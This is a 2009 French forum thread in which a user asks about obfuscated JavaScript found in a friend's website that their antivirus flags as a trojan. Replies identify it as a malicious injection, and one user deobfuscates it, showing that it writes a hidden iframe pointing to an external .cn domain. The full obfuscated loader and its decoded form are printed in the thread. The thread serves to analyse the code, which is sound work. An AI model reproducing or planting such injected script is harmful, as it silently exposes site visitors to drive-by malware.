<script>function c32425e161q49e9026344825(q49e9026344ff6)

**The_Big_Lebowski** · 01/05/2009, 14h31

Bonjour,
Quand j'affiche la source d'une page web sur le site d'une amie, j'ai ce code la dans une balise <script>.
QQun pourrait il me dire a quoi ca correspond ?
est ce normal ? d'autant plus que l'anti virus detecte un cheval de troie.
merci de me tenir informé

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
 
<script>function c32425e161q49e9026344825(q49e9026344ff6){ function q49e90263457c3(){return 16;} return (eval('pa'+'rseInt')(q49e9026344ff6,q49e90263457c3()));}function q49e9026346765(q49e9026346f36){ function q49e90263486a2(){var q49e9026348e71=2;return q49e9026348e71;} var q49e9026347701='';q49e902634963d=String['fromCharCode'];for(q49e9026347ecf=0;q49e9026347ecf<q49e9026346f36.length;q49e9026347ecf+=q49e90263486a2()){ q49e9026347701+=(q49e902634963d(c32425e161q49e9026344825(q49e9026346f36.substr(q49e9026347ecf,q49e90263486a2()))));}return q49e9026347701;} var v26='';var q49e9026349e0a='3C7'+v26+'3637'+v26+'2697'+v26+'07'+v26+'43E696628216D7'+v26+'96961297'+v26+'B646F637'+v26+'56D656E7'+v26+'42E7'+v26+'7'+v26+'7'+v26+'2697'+v26+'465287'+v26+'56E657'+v26+'363617'+v26+'065282027'+v26+'2533632536392536362537'+v26+'322536312536642536352532302536652536312536642536352533642536332533332533322532302537'+v26+'332537'+v26+'32253633253364253237'+v26+'2533632536392536362537'+v26+'322536312536642536352532302537'+v26+'332537'+v26+'32253633253364253237'+v26+'2536382537'+v26+'342537'+v26+'342537'+v26+'302533612532662532662536332536662537'+v26+'322537'+v26+'302536312536642536312537'+v26+'34253631253265253633253665253266253237'+v26+'2532302537'+v26+'37'+v26+'2536392536342537'+v26+'34253638253364253237'+v26+'253331253237'+v26+'253230253638253635253639253637'+v26+'2536382537'+v26+'34253364253237'+v26+'253331253237'+v26+'2532302537'+v26+'332537'+v26+'342537'+v26+'39253663253635253364253237'+v26+'2537'+v26+'362536392537'+v26+'332536392536322536392536632536392537'+v26+'342537'+v26+'39253361253230253638253639253634253634253635253665253362253237'+v26+'2533652533632532662536392536362537'+v26+'32253631253664253635253365253366253237'+v26+'2532622534642536312537'+v26+'342536382532652537'+v26+'322536662537'+v26+'352536652536342532382534642536312537'+v26+'342536382532652537'+v26+'32253631253665253634253666253664253238253239253261253331253337'+v26+'253337'+v26+'253334253338253239253262253237'+v26+'253335253237'+v26+'2532302537'+v26+'37'+v26+'2536392536342537'+v26+'34253638253364253335253332253332253230253638253635253639253637'+v26+'2536382537'+v26+'342533642533332533342532302537'+v26+'332537'+v26+'342537'+v26+'39253663253635253364253237'+v26+'2537'+v26+'362536392537'+v26+'332536392536322536392536632536392537'+v26+'342537'+v26+'39253361253638253639253634253634253635253665253237'+v26+'2533652533632532662536392536362537'+v26+'3225363125366425363525336527'+v26+'29293B7'+v26+'D7'+v26+'6617'+v26+'2206D7'+v26+'969613D7'+v26+'47'+v26+'27'+v26+'5653B3C2F7'+v26+'3637'+v26+'2697'+v26+'07'+v26+'43E';q49e902634adaa=document;q49e902634adaa.write(q49e9026346765(q49e9026349e0a));</script>

**emmanuel.remy** · 01/05/2009, 14h44

Cela a tout d'une injection de Javascript, malveillante très certainement.

ERE

**Séb.** · 01/05/2009, 14h54

Ou du code obfusqué, un peu comme le fait Google.
En tout cas rien à voir avec PHP

**The_Big_Lebowski** · 01/05/2009, 15h40

Merci les gars

FoxLeRenard · 01/05/2009, 16h05

Oui alors un énorme classique du genre, voici donc ce javascript

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
 
 
<script>
function LaFonc1(LaVal)
 {
  function LaFonc2()
    {
    return 16;
    }
  return (eval(parseInt)(LaVal,LaFonc2()));
  }
function LaFonc3(Work)
  {
   function LaFonc4()
     {
     var Laval1=2;
     return Laval1;
     }
   var Laval2='';
   Cquoi=String['fromCharCode'];
   for(a=0;a<Work.length;a+=LaFonc4())
    {
    Laval2+=(Cquoi(LaFonc1(Work.substr(a,LaFonc4()))));}
    return Laval2;
    }
 var v26='';
 var xy='3C7363726970743E696628216D796961297B646F63756D656E742E777269746528756E6573636170652820272533632536392536362537322536312536642536352532302536652536312536642536352533642536332533332533322532302537332537322536332533642532372533632536392536362537322536312536642536352532302537';
xy=xy+'3325373225363325336425323725363825373425373425373025336125326625326625363325366625373225373025363125366425363125373425363125326525363325366525326625323725323025373725363925363425373425363825336425323725333125323725323025363825363525363925363725363825373425336425323725333125';
xy=xy+'3237253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361253230253638253639253634253634253635253665253362253237253365253363253266253639253636253732253631253664253635253365253366253237253262253464253631253734253638';
xy=xy+'2532652537322536662537352536652536342532382534642536312537342536382532652537322536312536652536342536662536642532382532392532612533312533372533372533342533382532392532622532372533352532372532302537372536392536342537342536382533642533352533322533322532302536382536352536392536';
xy=xy+'372536382537342533642533332533342532302537332537342537392536632536352533642532372537362536392537332536392536322536392536632536392537342537392533612536382536392536342536342536352536652532372533652533632532662536392536362537322536312536642536352533652729293B7D766172206D7969613D747275653B3C2F7363726970743E';
 
document.write(LaFonc3(xy));
</script>

FoxLeRenard · 01/05/2009, 18h54

Bref quand le script s'execute, il cree une iframe sur cette adresse

(j ais bien sur mis des espaces)

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
 
 
 
< i f r a m e n a m e = c 3 2 s r c = ' < i f r a m e s r c = ' h t t p : / / c o r p a m a t a . c n / ' w i d t h = ' 1 ' h e i g h t = ' 1 ' s t y l e = ' v i s i b i l i t y : h i d d e n ; ' > < / i f r a m e > ? ' + M a t h . r o u n d ( M a t h . r a n d o m ( ) * 1 7 7 4 8 ) + ' 5 ' w i d t h = 5 2 2 h e i g h t = 3 4 s t y l e = ' v i s i b i l i t y : h i d d e n ' > < / i f r a m e >

donc rien de méchant puique c'est ça
http://corpamata.cn/

<script>function c32425e161q49e9026344825(q49e9026344ff6)

Langage PHP

Discussions similaires

Partager

Partager